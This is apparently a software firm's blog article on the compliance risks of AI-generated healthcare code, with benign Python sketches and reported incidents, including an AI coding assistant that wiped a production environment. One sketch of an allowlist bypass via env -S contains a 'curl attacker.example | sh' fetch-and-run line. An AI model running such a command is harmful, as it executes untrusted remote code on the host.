The problem isn’t that AI can’t write working code. It’s that in healthcare, working code is the easy part. The hard part is proving, to regulators, clinicians, and auditors, that the software is compliant.
By “vibe coding” we mean building systems through AI prompting and shipping code without formal architecture review, compliance mapping, or clinical risk assessment. It’s an effective approach in many contexts. It’s also genuinely exciting that people from non-developer backgrounds are engaging with software development in their own ways. However, healthcare is a context where AI-generated code needs an extra layer of expert scrutiny before it goes anywhere near patients.
So let’s look at what compliance requires that AI doesn’t reliably provide, where generated code creates problems that only become visible late in a project, and what experienced developers bring to this work that cannot be replicated by prompting.
Examples of Vibe Coding Gone Wrong in 2026
Amazon, 2025–2026
Amazon mandated that 80% of engineers use its AI coding assistant, Kiro, weekly. In December 2025, Kiro received operator-level permissions to fix a minor issue in AWS Cost Explorer. Rather than applying a targeted patch, it deleted and recreated the entire production environment. The outage lasted 13 hours.
Then, in March 2026, an AI-assisted deployment took Amazon’s retail site down for six hours, causing a reported 99% drop in US order volume. Amazon responded by mandating senior engineer sign-off on all AI-assisted production deployments. That response highlights why human review of AI output matters, even in well-resourced engineering teams.
Now consider what operator-level permissions mean in a medical application: access to patient records, clinical data, prescribing systems, and appointment infrastructure. An outage in that context isn't a revenue number. It's a clinical risk event.
Orchids, February 2026
Security researcher Etizaz Mohsin demonstrated a critical vulnerability in Orchids, a vibe-coding platform claiming one million users, to the BBC. In a controlled test, Mohsin accessed a BBC journalist’s active project remotely, inserted a single malicious line of code among thousands of AI-generated lines, and took full control of the journalist’s laptop, with zero interaction required from the victim. No phishing email. No link to click. The attack was invisible until a file appeared on the desktop. The vulnerability remained unfixed at the time of the BBC report.
What matters is the mechanism: AI-generated code that non-technical users cannot read or review, running with deep system access, on devices that in a healthcare context might hold patient data or connectivity to NHS infrastructure. In a medical application, an invisible code injection isn’t just a reputational problem. It’s a data breach, a DSP Toolkit incident, and potentially a criminal matter under the Computer Misuse Act.
OpenClaw, 2025–2026
AI-generated guardrail logic in OpenClaw, an open-source container security tool, failed to account for shell wrapper payloads. When /usr/bin/env was allowlisted by the AI-generated security policy, attackers used env -S to bypass the policy analysis entirely and execute arbitrary commands at runtime. The AI had treated the security configuration as a linguistic pattern, matching a string against a list, rather than understanding the functional behaviour of what it was permitting. The allowlist looked correct. It was not.
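To make the mechanism concrete, here is a minimal Python sketch of that failure mode, assuming a policy engine that matches executable paths as strings. The allowlist and the attacker command are illustrative, not taken from OpenClaw itself.

```python
# A naive policy that allowlists binaries by path: it matches strings
# rather than reasoning about what the binary will go on to execute.

ALLOWLIST = {"/usr/bin/env", "/usr/bin/python3"}

def naive_policy_check(argv: list[str]) -> bool:
    # Only the first element of argv is ever inspected.
    return argv[0] in ALLOWLIST

# Blocked, as intended: bash is not on the list.
naive_policy_check(["/bin/bash", "-c", "curl attacker.example | sh"])   # False

# Approved, because /usr/bin/env is on the list. env's -S flag splits the
# quoted string into arguments and executes them, so the policy has
# effectively approved an arbitrary shell command.
naive_policy_check(["/usr/bin/env", "-S", "bash -c 'curl attacker.example | sh'"])  # True
```

The check is syntactically correct and passes any test that only exercises the allowlisted paths directly, which is exactly why the hole survived review.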
This is the category of failure that is hardest to catch and most dangerous in a regulated environment: code that passes review, passes testing, and fails in a way that only becomes apparent when someone who understands the actual attack surface probes it deliberately.
Not sure whether NHS compliance requirements apply to your project, or where to get started? The NHS provides a resources hub for teams wanting to use NHS services in their projects, along with access to an open developer community forum.
The Compliance Landscape AI Cannot Navigate
Several frameworks typically apply to healthcare software. These include UK GDPR and the Data Protection Act 2018, the NHS Digital Data Security and Protection Toolkit, and the Digital Technology Assessment Criteria (DTAC). Additionally, DCB0129 and DCB0160 clinical safety standards require mandatory hazard logs, safety cases, and designated clinical safety officers. MHRA regulations apply where the application qualifies as a medical device, and HL7 FHIR standards govern any application connecting to NHS systems.
Crucially, these frameworks interact. A clinical safety case under DCB0129 depends on a data flow analysis that shapes how UK GDPR obligations apply. DTAC draws on both. Furthermore, MHRA classification determines which ISO 13485 quality management requirements are triggered. Getting one wrong affects the others. Consequently, teams must make the decisions that determine how frameworks interact at the architectural level, before most of the code exists.
AI tools can surface fragments of this knowledge. Even so, they cannot reliably apply it in context, reason about how frameworks interact for a specific product, or take responsibility for the decisions.
Note that DTAC version 2 was introduced this year. It simplifies the assurance process slightly, with 25% fewer questions, and waives the NHS Digital training requirement for clinical safety officers.
What to Watch Out For
Audit trail gaps
Every creation, read, update, and deletion of patient data typically needs to be logged with a timestamp, a user identifier, the nature of the change, and often the reason. AI tools generate functional CRUD operations well, but what they tend to produce is application-level error logging, which is not the same as the immutable, tamper-evident access records a Data Protection Impact Assessment or a CQC inspection would expect to see. This distinction is not subtle, but it is consistently missed in AI-generated codebases.
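As a rough illustration of the difference, here is a minimal Python sketch of a hash-chained, append-only access record. The field names and in-memory list are illustrative assumptions, not a reference implementation of any NHS standard.

```python
import hashlib
import json
from datetime import datetime, timezone

def append_audit_entry(log: list[dict], *, user_id: str, patient_id: str,
                       action: str, reason: str) -> dict:
    """Append one tamper-evident access record to the audit log."""
    prev_hash = log[-1]["entry_hash"] if log else "GENESIS"
    entry = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "user_id": user_id,        # who accessed the record
        "patient_id": patient_id,  # whose data was touched
        "action": action,          # e.g. "READ", "UPDATE", "DELETE"
        "reason": reason,          # why the access happened
        "prev_hash": prev_hash,    # chains this entry to the one before it
    }
    entry["entry_hash"] = hashlib.sha256(
        json.dumps(entry, sort_keys=True).encode()
    ).hexdigest()
    log.append(entry)
    return entry

audit_log: list[dict] = []
append_audit_entry(audit_log, user_id="clinician-042", patient_id="local-1234",
                   action="READ", reason="pre-appointment review")
```

Because each entry carries the hash of the one before it, altering or deleting an earlier record breaks the chain, which is the tamper evidence an auditor is looking for. Generic error logging gives you none of that.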
Role-based access
AI-generated authentication tends toward the generic: admin versus user, authenticated versus unauthenticated. Clinical governance, by contrast, requires permission hierarchies that reflect actual roles. For example, clinicians may view certain record types but not others, administrators may access demographics but not clinical notes, and third-party integrations may need read-only access to specific data subsets. Getting this wrong produces unauthorised access to patient data — a notifiable breach under UK GDPR.
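A minimal sketch of what role-aware permissions look like compared with a generic admin/user split. The roles, resource types, and permission sets here are illustrative assumptions; a real system would derive them from the organisation's clinical governance model.

```python
from enum import Enum

class Resource(Enum):
    DEMOGRAPHICS = "demographics"
    CLINICAL_NOTES = "clinical_notes"
    PRESCRIPTIONS = "prescriptions"
    LAB_RESULTS = "lab_results"

# Each role maps to the set of (resource, action) pairs it may perform.
PERMISSIONS = {
    "clinician":       {(Resource.DEMOGRAPHICS, "read"),
                        (Resource.CLINICAL_NOTES, "read"),
                        (Resource.CLINICAL_NOTES, "write"),
                        (Resource.LAB_RESULTS, "read"),
                        (Resource.PRESCRIPTIONS, "write")},
    "receptionist":    {(Resource.DEMOGRAPHICS, "read"),
                        (Resource.DEMOGRAPHICS, "write")},  # no clinical data
    "integration_bot": {(Resource.LAB_RESULTS, "read")},    # read-only subset
}

def is_permitted(role: str, resource: Resource, action: str) -> bool:
    """Deny by default; allow only what the role explicitly holds."""
    return (resource, action) in PERMISSIONS.get(role, set())

assert is_permitted("clinician", Resource.CLINICAL_NOTES, "read")
assert not is_permitted("receptionist", Resource.CLINICAL_NOTES, "read")
```

The point is not the data structure; it is that someone has to decide, deliberately, which roles exist and what each may touch. That decision cannot be inferred from a prompt.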
Data residency and storage by default
AI tools reach for whatever is convenient: a managed cloud database, a third-party service, a readily available API. Each of those choices carries data residency implications, data processor agreement requirements under UK GDPR, and potentially DSP Toolkit obligations. These are not decisions that should happen implicitly. They need to be made deliberately, documented, and reviewed against applicable standards before a line of storage code is written. Pseudonymisation, anonymisation, and encryption are also legally distinct categories under UK GDPR, each carrying different obligations, and AI-generated code rarely distinguishes between them consistently.
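To show why those categories are not interchangeable, here is a minimal sketch contrasting pseudonymisation with encryption. It assumes the third-party cryptography package for the encryption half; the key handling is deliberately simplified and is not a statement of what UK GDPR requires in any specific system.

```python
import hashlib
import hmac
from cryptography.fernet import Fernet  # assumes the 'cryptography' package is installed

# Held separately from the dataset; illustrative only.
SECRET_PSEUDONYM_KEY = b"keep-this-key-outside-the-dataset"

def pseudonymise(nhs_number: str) -> str:
    # Deterministic keyed hash: the same patient always maps to the same
    # pseudonym, so records can still be linked for analysis, but
    # re-identification requires the separately held key.
    return hmac.new(SECRET_PSEUDONYM_KEY, nhs_number.encode(), hashlib.sha256).hexdigest()

fernet = Fernet(Fernet.generate_key())

def encrypt(nhs_number: str) -> bytes:
    # Fully reversible by anyone holding the key; protects data at rest or
    # in transit but does not take it out of scope as personal data.
    return fernet.encrypt(nhs_number.encode())
```

Anonymisation, by contrast, means the data can no longer be related to an individual at all, with or without a key, which is a property of the whole dataset rather than of any single function call.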
Consent management complexity
Consent management remains a critical bottleneck because of the layered, revocable nature of consent for healthcare data under UK GDPR and the NHS National Data Opt-Out (NDOO).
While traditional AI tools were limited to generating static UI components like checkboxes, the 2026 landscape features a widening gap between these basic designs and the sophisticated, ‘agentic’ systems required for modern compliance. Under the oversight of the National Commission into the Regulation of AI in Healthcare, there is now a strict requirement for AI to distinguish between data used for individual care, where consent is often implied, and secondary research, where the National Data Opt-Out must be respected in real time.
Since AI tools are moving into direct patient interaction, they also face the ‘informed consent’ problem: they must now be capable of explaining their own complex logic to vulnerable adults and children, a level of legal and ethical transparency that basic AI generation cannot yet autonomously provide.
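A minimal sketch of what a purpose-aware consent check might look like: direct care and secondary research are handled differently, and the opt-out is only consulted for secondary uses. The field names and the opt-out lookup are illustrative assumptions, not the real NDOO service interface.

```python
def may_use_record(purpose: str, patient: dict) -> bool:
    """Decide whether a patient's record may be used for a given purpose."""
    if purpose == "direct_care":
        # Consent for individual care is generally implied; access is governed
        # by the clinician's legitimate relationship with the patient and by
        # the role-based controls described earlier.
        return True
    if purpose == "secondary_research":
        # Secondary uses must respect the National Data Opt-Out and any
        # explicit, still-current research consent - both are revocable.
        if patient.get("national_data_opt_out", False):
            return False
        consent = patient.get("research_consent", {})
        return consent.get("granted", False) and not consent.get("withdrawn", False)
    # Unknown purposes are denied by default.
    return False
```

The hard part is not the branching; it is keeping this decision current as consent is granted, layered, and withdrawn over time, and proving in an audit that every use of the data went through it.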
Clinical safety in data display
How information is presented in a clinical context is a patient safety issue, not only a UX decision. A medication displayed in an ambiguous format, a lab result shown without reference ranges, a critical alert insufficiently surfaced: all of these can contribute to clinical error. DCB0129 clinical safety standards codify exactly these concerns. AI tools generating UI components have no mechanism for evaluating clinical safety risk. They produce what looks reasonable. Reasonable is not the same as safe.
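A small sketch of the reference-range point: a result is never rendered as a bare number, but always with units, its reference range, and an explicit out-of-range flag. The range shown is illustrative and would in practice come from the lab and the patient's context, not a hard-coded constant.

```python
def render_lab_result(name: str, value: float, unit: str,
                      ref_low: float, ref_high: float) -> str:
    """Render a lab value with units, reference range and an abnormal flag."""
    flag = ""
    if value < ref_low:
        flag = "  ** LOW **"
    elif value > ref_high:
        flag = "  ** HIGH **"
    return f"{name}: {value} {unit} (reference {ref_low}-{ref_high} {unit}){flag}"

print(render_lab_result("Potassium", 6.1, "mmol/L", 3.5, 5.3))
# Potassium: 6.1 mmol/L (reference 3.5-5.3 mmol/L)  ** HIGH **
```

Whether that flag is prominent enough, and what happens when it is missed, is exactly the kind of hazard a DCB0129 hazard log is supposed to capture.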
Catching Problems Too Late
Structural compliance failures tend to surface late. The code is functional. The demo is convincing. The MVP passes internal review. Then a DTAC submission, a penetration test, or an NHS procurement process reveals an architectural problem that no patch can fix.
For example, adding audit logging retrospectively means touching every data access point in an application built over months. Similarly, authentication architecture that doesn’t meet NHS Identity requirements demands rearchitecting from the ground up. And a data model built without Fast Healthcare Interoperability Resources (FHIR) interoperability in mind, specifically FHIR UK Core, becomes very expensive to change once data exists in it and integrations depend on its structure.
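For a sense of what "FHIR-shaped from the start" means, here is a hand-written sketch of a patient record expressed as a FHIR Patient resource, with the NHS number carried under the standard NHS number system URI. It is an illustration, not a validated UK Core profile instance, and the demographic values are made up.

```python
# A FHIR Patient resource, represented as plain Python data for illustration.
patient_resource = {
    "resourceType": "Patient",
    "identifier": [{
        "system": "https://fhir.nhs.uk/Id/nhs-number",  # standard NHS number system URI
        "value": "9434765919",                          # example NHS number, not a real patient
    }],
    "name": [{"family": "Smith", "given": ["Jane"]}],
    "birthDate": "1980-04-12",
}

# A bespoke schema such as {"patient_name": "Jane Smith", "nhs_no": "943 476 5919"}
# stores the same facts, but remapping it onto this structure after integrations
# already depend on it is the expensive rework described above.
```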
The consequences extend beyond development cost. DTAC failures block NHS procurement entirely. DSPT compliance is mandatory for handling patient data. And a clinical safety case under DCB0129 that teams cannot complete, because they never identified the hazards, means the product cannot deploy at all.
A 2025 Stack Overflow survey found that 46% of developers don’t trust the accuracy of AI tool output, up from 31% in 2024. Senior developers also reported spending more time debugging AI-generated code than human-written code. That underscores why AI is a powerful accelerant, but not a replacement for expert review.
Why Experienced Developers Are Essential for Healthcare
The contribution experienced developers make to medical software is primarily contextual, not syntactic. For instance, they know which regulatory framework applies to a specific feature decision. They recognise when a product requirement carries clinical safety implications that the team hasn’t surfaced. They spot architectural patterns that will create compliance problems six months later when an NHS integration becomes necessary, as we found when building a sexual health chatbot for NHS trusts. Developers also understand that DTAC evidence requirements mean documentation must run throughout development, not get assembled at the end.
Overall...
If you’ve used AI tools or vibe coding to prototype your idea, that’s a great start. Getting something tangible built quickly is genuinely valuable, and it’s exactly the kind of initiative we want to support. The next step for any healthcare application, therefore, is to bring in a development team who understand the compliance landscape. They can assess what you’ve built, restructure it where needed, and take it safely through to deployment.
In short, the answer is not to avoid AI tools. Instead, use them in a role that matches their capability: accelerating implementation within a structure that people who understand compliance have defined. For healthcare software, that structure isn’t optional, and with the right team, it’s entirely achievable.


